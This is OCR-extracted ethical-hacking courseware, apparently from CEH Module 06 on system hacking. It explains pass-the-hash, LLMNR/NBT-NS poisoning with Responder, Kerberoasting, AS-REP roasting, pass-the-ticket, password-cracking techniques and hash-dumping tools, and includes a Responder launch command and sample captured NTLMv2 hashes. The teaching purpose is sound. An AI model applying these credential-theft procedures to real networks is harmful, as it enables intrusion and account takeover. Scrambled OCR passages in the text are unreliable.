Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Attackers exploit such authentication mechanisms and first exploit the target server to retrieve the hashes from the SAM databases. They then input the hashes acquired directly into the authentication mechanism to authenticate with the user’s stolen precomputed hashes. Thus, in a hash injection/PtH attack, the attackers inject a compromised LanMan (LM) or NTLM hash into a local session and then use the hash to authenticate to the network resources. Any server or service (running on Windows, UNIX, or any other OS) using NTLM or LM authentication is susceptible to this attack. This attack can be launched on any OS, but Windows could be more vulnerable owing to its Single-Sign-On (SSO) feature that stores passwords inside the system and enables users to access all the resources with a one-time login. Different techniques are used to perform a hash injection/PtH attack: o

The attacker tries to compromise

admin

user’s

local

password

hashes

from

the

privileges to capture cache values of the user account

database

or SAM.

However,

offline usage of these cached hashes can be restricted by the network admin. Hence, this approach may not always be feasible. o

The attacker dumps the password hashes from the local user account database or SAM to retrieve password hashes of local users, and gains access to admin accounts to compromise other connected systems.

o

The attacker captures LM or NTLM challenge—-response messages between the client and server to extract encrypted hashes through brute-forcing.

oO.

The attacker retrieves the credentials of local users as well as those belonging to the security domain from the Windows Isass.exe process.

The hacker carries out this attack by implementing the following five steps:

=

©

The hacker compromises one workstation/server using a local/remote exploit.

o

The hacker extracts stored hashes using tools such as pwdump7, finds a domain admin account hash.

o

The hacker uses tools such as Mimikatz to place one of the retrieved hashes in his/her local Isass.exe process and then uses the hash to log on to any system (domain controller) with the same credentials.

o.

The hacker extracts all the hashes from the Active Directory database and can now compromise any account in the domain.

Mimikatz, etc. and

LLMNR/NBT-NS Poisoning LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows OSs used to perform name resolution for hosts present on the same link. These services are enabled by default in Windows OSs. When the DNS server fails to resolve name queries, the host performs an unauthenticated UDP broadcast asking all the hosts if anyone has a name that it is looking for. As the host trying to connect is following an unauthenticated and broadcast

Module 06 Page 612

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

process, it becomes easy for an attacker to passively listen to a network for LLMNR (UDP port 5355) and NBT-NS (UDP port 137) broadcasts and respond to the request pretending to be a target host. After accepting a connection with a host, the attacker can utilize tools such as Responder.py or Metasploit to forward the request to a rogue server (for instance, TCP: 137) to perform an authentication process. During the authentication process, the attacker sends an NTLMv2 hash to the rogue server, which was obtained from the host trying to authenticate itself. This hash is stored in a disk and can be cracked using offline hash-cracking tools such as hashcat or John the Ripper. Once cracked, these credentials can be used to log in and gain access to the legitimate host system. Steps involved in LLMNR/NBT-NS poisoning: 1.

The user sends a request to connect to the data-sharing system, \\DataServer, which

she mistakenly typed as \\DtaServr. 2.

The \\DataServer responds to the user, saying that it does not know the host named \\DtaServr.

3.

The user then performs a LLMNR/NBT-NS network knows the host name\\DtaServr.

4.

The attacker replies to the user saying that it is \\DataServer, NTLMvz2 hash, and responds to the user with an error.

broadcast

to find out if anyone

in the

accepts the user

User performs

LLMNR/NBT-NS

broadcast to find out i

anyone knows User sends incorrect

host name — \\DtaServr e

\\DtaServ

boo

[stele] 2) ceeeeeeeeeeeeeeeeeeeeees > Data

\\DtaServr— NOT FOUND

Server

Host 3

Attacker responds saying that he knows \\DtaServr, accepts NTLMv2 hash and

then sends an ERROR MSG

ae

7m Attacker

Figure 6.12: LLMNR/NBT-NS poisoning attack

LLMNR/NBT-NS Poisoning Tools o

Responder

Source: https://github.com Responder is an LLMNR, NBT-NS, and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only Module 06 Page 613

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

responds to a File Server Service request, which is for SMB. As shown in the screenshots, attackers use the Responder tool to extract information such as the target system’s OS version, client version, NTLM client IP address, NTLM username, and password hash. ubuntu@ubuntu-virtual-Machine: ~/Responder

[sudo]

password

for

ubuntu:

§f

$ cd Responder $ chmod +x ./Responder.py $ sudo ./Responder.py -I etho

Figure 6.13: Screenshot of Responder

A

ubuntu@ubuntu-Virtual-Machine: ~/Responder Responder IP Challenge set

| Error starting TCP server on port 86, check permissions or other servers running. Listening

for events

NTLM @.10.1.11 NTLMv2-SSP Username : Windowsda\gas0n NTLMv2-SSP_Hash Jason: :Windows11:1122334455667788:4A51E1A82DB9226267684EAA3B03B9A6: 010100001 (9000000FAB168DCAF45D801694987E99B081D8F 0000800002000A005300400042003100320001000A00530040084200310032001 4000A0053004D0042003100320003000A005300400042003100320005000A0053004D00420031003200080030003 000000000001 (0000100000000200000796FD0ES13925D289AF 7F707E7261BEE3A9AG42084D2F 7C7F7494B8C108B60090A0010000000000000001

[*] Skipping previously captured hash for Windows11\Jason Requested

Share

:

\\CEH-TOOLS\IPCS

[*] Skipping previously captured hash for Windows11\Jason Requested

Share

: \\CEH-TOOLS\IPCS.

[*] Skipping previously captured hash for Windowsi1\Jason Requested Share : \\CEH-TOOLS\IPCS

Figure 6.14: Screenshot of the output of Responder showing NTLM hashes

=

Internal Monologue Attack The internal monologue attack is similar to the attack performed that the memory area of the Local Security Authority Subsystem is not dumped, thereby avoiding Windows Credential Guard and post-exploitation tool, through which attackers can extract Kerberos tickets, and NTLM hashes from LSASS process memory.

Module 06 Page 614

using Mimikatz, except Service (LSASS) process antivirus. Mimikatz is a plaintext passwords, Attackers use Mimikatz

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

to retrieve user credentials from LSASS process memory, and the acquired information helps them in performing lateral movement in the post-exploitation phase. An internal monologue attack is usually performed in a secure environment where Mimikatz cannot be executed. In this attack, using the Security Support Provider Interface (SSPI) from a user-mode application, a local procedure call to the NTLM authentication package is invoked to calculate the NetNTLM response in the context of the logged-on user. Steps to perform an internal monologue attack:

1.

The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic.

2.

The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.

3.

Now, the attacker interacts with NTLM SSP locally, for each masqueraded user to obtain a NetNTLMv1 response to the chosen challenge in the security context of that

user.

4.

Now, the attacker restores LMCompatibilityLevel, RestrictSendingNTLMTraffic to their actual values.

NTLMMinClientSec,

and

5.

The attacker uses rainbow tables to crack the NTLM hash of the captured responses.

6.

Finally, the attacker uses the cracked hashes to gain system-level access. Disable the security controls of NetNTLMv1.

Crack the NTLM

hash using rainbow tables

Use the cracked hashes to gainsystem-level acces: Client

Figure 6.15: Depiction of internal monologue attack

=

Cracking Kerberos Password Kerberos is the most commonly used authentication protocol for network entities. Due to its widespread acceptance, it is susceptible to various attacks. Attackers have developed various ways to hack into Kerberos and exploit its vulnerabilities to crack weak passwords, inject malicious codes, and obtain information about the network infrastructure and various network entities. Attackers target Kerberos authentication protocol in two common ways: namely, cracking the TGS, known as Kerberoasting, and cracking the TGT, known as AS-REP Roasting.

Module 06 Page 615

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking co

Exam 312-50 Certified Ethical Hacker

AS-REP Roasting (Cracking TGT) In this attack, attackers request an authentication ticket (TGT) from the KDC in the form of an AS-REQ packet. If the user account exists, the KDC replies with a TGT encrypted with the account’s credentials. This allows attackers to receive an encrypted ticket, which can then be saved offline and further cracked to obtain the password. Attackers can perform this type of attack both actively and passively. In an active scenario, attackers generate an AS-REP message for the user, whereas in a passive scenario, attackers observe an AS-REP message. In Kerberos authentication, the pre-authentication mode is enabled by default and is

designed to prevent offline password-guessing attacks. Therefore, to perform an ASREP Roasting attack, attackers must identify user accounts with pre-authentication mode disabled, i.e., the user account must be set to “Do not require Kerberos authentication.” Attackers use tools such as Rubeus to perform AS-REP roasting attacks. The following steps are involved in AS-REP Roasting: 1.

The attacker disabled.

identifies

a

user

account

with

the

pre-authentication

option

2.

On behalf of the user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.

3.

The domain controller verifies the user account and replies with a TGT encrypted

4.

The attacker stores the TGT offline, and cracks it to extract the user account password and further access the network entity (here, the application server).

with the account's credentials.

Domain

©

Controller/ KDC

obtain password

,

Discover user

Crack TGT,

account with pre-

authentication disabled

Application PP Server

Attacker Figure 6.16: AS-REP Roasting

Module 06 Page 616

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking o

Exam 312-50 Certified Ethical Hacker

Kerberoasting (Cracking TGS) In this attack, attackers request a TGS for the service principal name (SPN) of the target service account. This request is made to the domain controller by using a valid domain user’s authentication ticket (TGT). The domain controller does not have any records; if the user has accessed the network resources, it just searches the SPN in the Active Directory, and further replies with an encrypted ticket using a service account linked with SPN. The type of encryption used for the requested service ticket (ST) is RC4_HMAC_MDS, which indicates that for encrypting the ST, the NTLM password hash is used. To crack the ST, attackers export the TGS tickets from memory and save them offline to the local system. Furthermore, attackers use different NTLM hashes to crack the ST and, on successfully cracking it, the service account password can be discovered. Attackers use tools such as Kerberoast to perform Kerberoasting attacks on Kerberos authentication. The following steps are involved in Kerberoasting: 1.

On behalf of a user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.

2.

The domain controller verifies the user account and replies with an encrypted TGT.

3.

With a valid user authentication ticket (TGT), the attacker requests the TGS.

4.

The domain controller verifies the TGT and replies with a TGS ticket.

5.

The attacker stores the TGS ticket offline, and cracks it to extract the service account password and further access the network entity (here, the application server).

Domain Controller/ KDC

* @,' @

bie:

§:

Oo:

@: 2: aioe:

2: ©:

@: :

B:

2 Pere:

gig: gf 8! a: 3: gi 8: (4)

v

Vv

Crack TGS, obtain password

Application

Attacker

Server

Figure 6.17: Kerberoasting

Module 06 Page 617

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Pass-the-Ticket Attack Pass-the-ticket is a technique used for authenticating a user to a system that Kerberos tickets without providing the user’s password. Kerberos authentication users to access services provided by remote servers without the need to passwords for every requested service. To perform this attack, the attacker Kerberos tickets of legitimate accounts using credential dumping tools.

is using allows provide dumps

ATGT or ST can be captured based on the level of access permitted to a client. Here, the ST permits access to specific resources, and the TGT is used to send a request to the TGS for the ST to access all the services the client has been authorized to access. Silver Tickets are captured for resources that use Kerberos for the authentication process, and can be used to create tickets to call a specific service and access the system that offers the service. Golden tickets are captured for the domain with the KDS KRBTGT NTLM hash that allows the creation of TGTs for any profile in the Active Directory. Attackers launch pass-the-ticket attacks either by stealing the ST/TGT from an end-user machine and using it to disguise themselves as a valid user, or by stealing the ST/TGT from a compromised AS. After obtaining one of these tickets, an attacker can gain unauthorized access to the network services and search for additional permissions and critical data. Attackers use tools such as Mimikatz, launch pass-the-ticket attacks:

o

Rubeus,

Windows

Credentials

Editor,

etc.

to

Mimikatz

Source: https://github.com Mimikatz allows attackers to pass Kerberos TGT to other computers and sign in using the victim’s ticket. The tool also helps in extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is an open-source tool that enables anyone to see and store authentication data such as Kerberos tickets. Attackers can leverage this for privilege escalation and credential stealing.

Module 06 Page 618

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Figure 6.18: Screenshot of Mimikatz Other Active Online Attacks =

Combinator Attack In a combinator attack, attackers combine of the second dictionary. The resultant list and compound words. Attackers use this system and gain unauthorized access to the

the entries of the first dictionary with those of entries can be used to produce full names wordlist to crack a password on the target system files.

Steps involved in a combinator attack: o

Finda

valid target user.

o

Build your own two from online sources.

o.

Create a final wordlist by merging entries of two separate dictionaries. For example, if the first dictionary contains 100 words, and the second dictionary contains 70 words, then the merged dictionary contains 100 x 70 = 7000 words.

o

Use automated tools, such as hashcat, to crack the password of the target user.

dictionaries or download

two

different wordlist dictionaries

Attackers perform this type of password cracking in a situation where a random phrase of words is used as a default password generation procedure.

Module 06 Page 619

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Fingerprint Attack In a fingerprint attack, the passphrase is broken down into fingerprints consisting of single- and multi-character combinations that a target user might choose as his/her password. For example, for a word ‘password’, this technique would create

fingerprints “p’, “a”, ’s”, "8", "w", "0", "x", “a”, “pa”, "ss", “wo”, “rd”, etc, Attackers usually perform this attack to crack complex passwords such as “pass-10”. To perform this attack, attackers create a list of unique password hashes from a leaked password hash database, and then perform a brute-force attack to obtain a wordlist and further start the fingerprint attack. PRINCE Attack

A PRobability INfinite Chained Elements (PRINCE) attack is an advanced version of a combinator attack in which, instead of taking inputs from two different dictionaries, attackers use a single input dictionary to build chains of combined words. This chain can have between 1 and n words from the input dictionary concatenated together to forma chain of words. For example, if the length of characters to be guessed is 5, then the following combinations are created from the input dictionary: 5-letter word 3-letter word + 2-letter word 2-letter word + 3-letter word 1-letter word + 4-letter word

w @tC. Toggle-Case Attack In a toggle-case attack, attackers try all possible upper-case and lower-case combinations of a word present in the input dictionary. For example, if a word in the input dictionary is “xyz”, the following set of combinations is generated:

w @tC. The success rate of this attack is low for the following reasons: o

If users use upper-case letters, they either use it in the first place or in between the word

o

In other cases, the users use a lower or equal number of upper-case lower-case letters

Module 06 Page 620

letters than

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Markov-Chain Attack In Markov-chain attacks, attackers gather a password database and split each password entry into two- and three-character syllables (2-grams and 3-grams); using these character elements, a new alphabet is developed, which is then matched with the existing password database. In the initial phase of this attack, attackers set a threshold parameter for the occurrences of the elements, and only the letters present in the new alphabet that occurred at least the minimum number of times are selected. Furthermore, this technique combines the selected letters into words with a maximum length of eight characters, and then a dictionary attack is performed to crack the target password. GPU-based Attack Graphics processing units (GPUs) are specialized circuits used in advanced computing devices to display graphics. GPUs can also be used by web browsers to expedite application processing in data centers and cloud environments. GPUs are based on cross-platform APIs such as OpenGL that can be accessed by any application on the device with user-level credentials or permissions. As computing devices such as laptops or desktops are configured with graphics drivers and libraries by default, GPU-based attacks can be launched through their APIs. To perform a GPU-based attack, attackers initially perform social engineering to trick the victim into downloading a malicious program or application. Then, the malicious program allows the attackers to secretly track user activities on the browser and perform side-channel leaks to steal passwords. The working of a GPU attack is as follows: o

The attacker lures or forces the victim into visiting an insecure site or downloading a malware-loaded application onto their system.

o

When the victim installs the malware-loaded accessing the browser’s OpenGL API.

o

The malware on OpenGL API sets up a spy on the device to track activities on the browser.

o

When the victim accesses any website via the browser, attackers can copy every character entered by the victim on the password field of the website.

Module 06 Page 621

application,

the

malware

starts

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

User is tricked to download and install malicious app

Malicious app exploits browser’s OpenGL API and sends user’s

browser activities to the attacker

eens

User opens a website through the infected browser and provides is/her credet s to login Attacker receives password characters v

entered by the user

Server

Attacker Figure 6.19: Illustration of a GPU-based password attack

Module 06 Page 622

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Passive Online Attacks: Wire Sniffing ‘@

CE H

Attackers run packet sniffer tools on the local area network (LAN) to access

and record the raw network traffic ‘@

The captured data may include sensitive information such as passwords (FTP, rlogin sessions, etc.) and emails

‘@

Sniffed credentials are used to gain unauthorized access to the target system

Wire Sniffing

“>

Computationally Complex

i) Victim

Attacker

Passive Online Attacks: Man-in-the-Middle/Manipulator-in-the-

Middle and Replay Attacks

cE H

ol

] |

@

] ]

] |

] |

l

‘@

Inan MITM attack, the attacker acquires access to

Considerations

the communication channels between the victim and the server to extract the information needed

©

Relatively hard to perpetrate

Ina

@

Must be trusted by one or both sides

@

Can sometimes be broken by

replay attack, packets and authentication tokens

are captured using a sniffer. After the relevant information is extracted, the tokens are placed back on the network to gain access

Victim

invalidating traffic

MITM/Repl: Replay

hts Reserved Reproduction i

Passive Online Attacks =

Wire Sniffing Packet sniffing is a form of wire sniffing or wiretapping in which hackers sniff credentials during transit by capturing Internet packets. Attackers rarely use sniffers to perform this type of attack. With packet sniffing, an attacker can gain passwords to applications such

Module 06 Page 623

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

as email, websites, SMB,

FTP, rlogin sessions, or SQL. As sniffers run in the background,

the victim remains unaware of the sniffing.

a

Victim

Attacker

Figure 6.20: Wire sniffing

As sniffers gather packets at the data link layer, they can grab all the packets on the LAN of the machine running the sniffer program. This method is relatively hard to perpetrate and computationally complicated. This is because a network with a hub implements a broadcast medium that all systems share on the LAN. The LAN sends the data to all machines connected to it. If an attacker runs a sniffer on one system on the LAN, he/she

can gather data tools are ideally sniffers, as they are efficient at include

sent to and from any other system on the LAN. The majority of sniffer suited to sniff data in a hub environment. These tools are passive passively wait for data transfer before capturing the information. They imperceptibly gathering data from the LAN. The captured data may

passwords

sent to remote

systems

during

FTP,

rlogin sessions,

and

electronic

mail. The attacker uses these sniffed credentials to gain unauthorized access to the target system. There are a variety of tools available on the Internet for passive wire sniffing. =

Man-in-the-Middle/Manipulator-in-the-Middle and Replay Attacks When two parties are communicating, a man-in-the-middle/manipulator-in-the-middle (MITM) attack can take place, in which a third party intercepts a communication between the two parties without their knowledge. The third party eavesdrops on the traffic and then passes it along. To do this, the “man in the middle” has to sniff from both sides of the connection

simultaneously.

In an MITM

attack, the attacker acquires

access to the communication channels between the victim and server to extract the information. This type of attack is often used in telnet and wireless technologies. It is not easy to implement such attacks owing to the TCP sequence numbers and the speed of the communication. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.

Original Connection

ateseneees Opt teeeeetenneenseneennesnsneensenansnesnsnensseeenseeesseeesseeeentensaesess >

preeeeeeeeeeeeeeeees >

:

Victim

ewei

i escess>> neeeersteten (RMI

MITM/ VRepla oe! RepI y

oo

«.

Web Server

Attacker Figure 6.21: Main-in-the-middle/manipulator-in-the-middle and replay attacks

Module 06 Page 624

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, the tokens are placed back on the network to gain access. The attacker uses this type of attack to replay bank transactions or similar types of data transfer, in the hope of replicating and/or altering activities, such as banking deposits or transfers.

Module 06 Page 625

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Offline Attacks: Rainbow Table Attack Rainbow te

| 4‘ainbowtableis a precomputed table that contains | Word lists like dictionary files, brute force lists, and their hash values

The hash of passwords is captured and compared

compare

| with the precomputed hash table. If a match is found,

ashes

E

then the password gets cracked

to

It is easyto recover passwords by comparing the

‘asy Recover

CE H

Tool to Create RainbowTables:rtgen

|@ The rtgen program needs several parametersto generate a rainbow table. The syntax for the command line is as

follows:

Syntax: rtgen hash_algorithn charset

plaintext_len min plaintext len max table index chain len chain num part_index

| | captured ‘hice password hashesto the precomputed Precomputed Hashes

lqazwed

“-® 42590034599c530b28a6a8£225d668590

hh021da

“* ©744b171 6cbf 8d4dd0 ff 4ce31a177151

9da8dasf

“® 30d696a8571a843cda453a229d741843

sodifo8sf

-

‘tte //orojectranbowerack com

"* ©744b171 6cbf 8d4dd0 ff 4ce31a177151

Offline Attacks: Distributed Network Attack ©@ A

CE H

Distributed Network Attack (DNA) technique is used for recovering passwords from hashes or password-

protected files using the unused processing power of machines across the network

@

The DNA Manager is installed in a central location where machines running on DNA Client can access it

over the network

@ The DNA Manager coordinates the attack and allocates small portions of the key search to machines that are distributed over the network @ The DNA Client runs in the background consuming only unused processor time

© The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password Al Rights Reserved. Reproduction is St

Offline Attacks Offline attacks occur when an attacker checks the validity of passwords. The attacker observes how the password is stored. If the usernames and passwords are stored in a readable file, it is easy for the attacker to gain access to the system. Hence, it is important to protect the list of passwords and keep it in an unreadable form, preferably encrypted.

Module 06 Page 626

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Offline attacks are often time-consuming but have a high success rate as the password hashes can be reversed owing to their small keyspace and short length. Notably, different passwordcracking techniques are available on the Internet. Two examples of offline attacks are as follows: 1.

Rainbow table attack

2.

Distributed Network Attack

=

Rainbow Table Attack A rainbow table attack requires less time than in memory to crack the table of all the possible table, in advance.

uses the cryptanalytic time-memory trade-off technique, which other techniques. It uses already-calculated information stored encryption. In the rainbow table attack, the attacker creates a passwords and their respective hash values, known as a rainbow

Rainbow Table: A rainbow table is a precomputed table that contains word lists like dictionary files and brute-force lists and their hash values. It is a lookup table specially used in recovering a plaintext password from a ciphertext. The attacker uses this table to look for the password and tries to recover it from password hashes. Computed Hashes: An attacker computes the hash for a list of possible passwords and compares it to the pre-computed hash table (rainbow table). If attackers find a match, they can crack the password. Compare the Hashes: An attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, then the password is cracked. It is easy to recover passwords by comparing captured password hashes to the pre-computed tables. Examples of pre-computed hashes:

Agqazwed

—-sss+ss++* »4259cc34599c530b28a6a8£225d668590

HhO2Z1da

-vveeeeee= »c744b1716cbf£8d4dd0f£4ce31a177151

Qda8dasf

-

SOdifOBSE

> 3cd696a8571a843cda453a229d741843

-++++++++-c744b1716cbf£8d4dd0

f£4ce31a177151

Figure 6.22: Pre-computed hashes

Tool to Create Rainbow Tables: rtgen

Source: http://project-rainbowcrack.com RainbowCrack is a general-purpose implementation that takes advantage of the time— memory trade-off technique to crack hashes. This project allows you to crack a hashed password.

Module 06 Page 627

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures ‘System Hacking

Exam 312-50 Certified Ethical Hacker

Attackers use the rtgen tool of this project to generate the rainbow tables. As shown in

the screenshot, the rtgen program needs several parameters to generate a rainbow table.

The syntax of the command line is: Syntax: rtgen

hash_algo rithm

plaintext_len_max

charset plaintext_len_min table_index chain_len chain_num part_index

Figure 6.23: Screenshot of rtgen

=

Distributed Network Attack A Distributed Network Attack (DNA) is a technique used for recovering passwordprotected files that utilize the unused processing power of machines spread across the network to decrypt passwords. In this attack, the attacker installs a DNA manager in a central location where machines running DNA clients can access it over a network. The DNA manager coordinates the attack and assigns small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking the processor time that was unused. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password. Attackers use the Password Recovery Toolkit (PRTK), which is equipped with DNA tools, to perform this attack. The features of a DNA are as follows: o.

Easily reads statistics and graphs

o

Adds user dictionaries to crack a password

o

Optimizes password atta cks for specific languages

o

Modifies the user dictionaries

o

Comprises stealth client installation functionality

o

Automatically updates cl ient while updating the DNA server

Module 06 Page 628

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

DNA can be classified into two modules: o

DNA Server Interface The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all the jobs that the DNA server is executing. The interface contains the following jobs:

o

e

Current Jobs: The current job queue consists of all the jobs the controller. The current job list has many columns, such number assigned by the DNA to the job, the name of the user’s password, the password that matches a key that can status of the job, and various other columns.

added to the list by as the identification encrypted file, the unlock the data, the

e

Finished Jobs: The finished job list provides information about the decryption jobs, including the password. It also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, etc.

DNA Client Interface Users can use the DNA client interface from many workstations. The interface helps the client statistics to coordinate easily and is available on machines with the preinstalled DNA client application. There are several components, such as the name of the DNA client, the name of the group to which the DNA client belongs, and the statistics about the current job.

Network Management The and can DNA

Network Traffic dialog box aids in the discovery of the network speed the DNA uses each work-unit length of the DNA client. Using the work-unit length, a DNA client work without contacting the DNA server. The DNA client application can contact the server at the beginning and end of the work-unit length.

The user can monitor the job status queue and DNA. After collecting the data from Network Traffic dialog box, the user can modify the client’s work. When the size of work-unit length increases, the speed of the network traffic decreases. A decrease in speed of the traffic leads the client working on the jobs to spend longer amounts time. Therefore, the user can make fewer requests to the server because of reduction in the bandwidth of network traffic.

Module 06 Page 629

the the the of the

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Password Recovery Tools Elcomsoft Distributed Password Recovery

Password Recovery Toolkit ‘tps:/eccessdate.com

Elcomsoft Distributed Password Recovery breaks complex passwords, recovers strong encryption keys, and unlocks documentsin a production environment

Passware Kit Forensic ‘tps:/ ww. pessware.com

hashcat ttps://hasheat.net

Ee rem ratemonmuncoenon

Windows Password Recovery Tool

(Se) https:/jwurw clears com

Pcuntocker ttps://amctop-possword.com

Password Recovery Tools Password recovery tools allow attackers to encryption keys, and unlock several documents.

=

br eak

complex

passwords,

recover

strong

Elcomsoft Distributed Password Recovery Source: https://www.elcomsoft.com

The Elcomsoft Distributed Password complex passwords, recover strong production environment.

Recovery application allows attackers to break encryption keys, and unlock documents in a

Attackers can use this tool to recover the passwords of the target system unauthorized access to the critical files and other system software.

Module 06 Page 630

to gain

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

@ Elcomsoft Distributed Password Recovery File Edit View Azure Sener Help

Dictionaries

Cert Rules

-

x

ese ot eae RIC OC

Attads

Mutations.

Result = Comment

dictionary

character group 70 hiktmmoparst

custom

mask brute force

config. pv... 13.496 %, 49m 258,

locahost: 12122

@ onine

Figure 6.24: Screenshot of Elcomsoft Distributed Password Recovery

Some of the password recovery tools are listed as follows:

=

Password Recovery Toolkit (https://accessdata.com)

=

Passware Kit Forensic (https://www.passware.com)

=

hashcat (https://hashcat.net)

=

Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)

=

PCUnlocker (https://www.top-password.com)

Module 06 Page 631

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Tools to Extract the Password

Hashes

pwdump7Z

Tools to Extract the Password Hashes

@ pwdump?7 extracts LM and NTLM password hashes of local user accounts from the Security Account

Manager

(SAM) database

@

Mimikatz (https://github.com)

-

i Administrator: Command Prompt

ox

©

Powershell Empire (https://github.com)

@

DSinternals PowerShell (https://github.com)

@

Ntdsxtract (https://github.com)

‘betes: /fuen.torascaorg

Note: These tools must be run with administrator privileges Copyright © by

Tools to Extract the Password Hashes The following tools can be used to extract the password hashes from the target system: =

pwdump7

Source: https://www.tarasco.org pwdump7 is an application that dumps the password hashes (one-way functions or OWFs) from NT’s SAM database. pwdump extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database. This application or tool runs by extracting the binary SAM and SYSTEM file from the filesystem, and then extracts the hashes. One of the most powerful features of pwdump7 is that it is also capable of dumping protected files. Pwdump7 can also extract passwords offline by selecting the target files. The use of this program requires administrative privileges on the remote system.

Module 06 Page 632

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

As shown in the screenshot, attackers use this tool to extract password hashes from the

target system.

Hi Administrator: Command Prompt

-

Oo

x

Figure 6.25: Screenshot of pwdump7

Some of the additional tools to extract password hashes are as follows:

=

Mimikatz (https://github.com)

=

Powershell Empire (https://github.com)

=

DSInternals PowerShell (https://github.com)

=

Ntdsxtract (https://github.com)

Note: The use of the above tools requires administrative privileges on the remote system.

Module 06 Page 633

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Password Cracking Using Domain Password Audit Tool (DPAT)

¢ E H

. that generates @ DPAT .isa Python script an from password hashes password use statistics .

More Info Daail

Count | 38803

dumped from a domain controller and a 7 password crack file such as hashcat.pot ‘ted using hashcat general 8 orclickable |@ Itgenerates an HTML report with : which - an attacker can open to analyze links, usernames, current passwords, and other statistics Password d statist

Ueerame| Current Passvord] Conical) | Cariy | Baseba77 | Dain | BackHais | Tay | Fa2019 | ry

dpat

pope

History| History] (EnPringin Baveba76 | Bascbal75 Binatue [Buastils Somme2019 | Sping2019

| Zodiak-Cancer|

| Histor? | Tiny kat | Baseballs | | Bacatiis |

|

88023

Passwords Discovered Through Cracking

68521

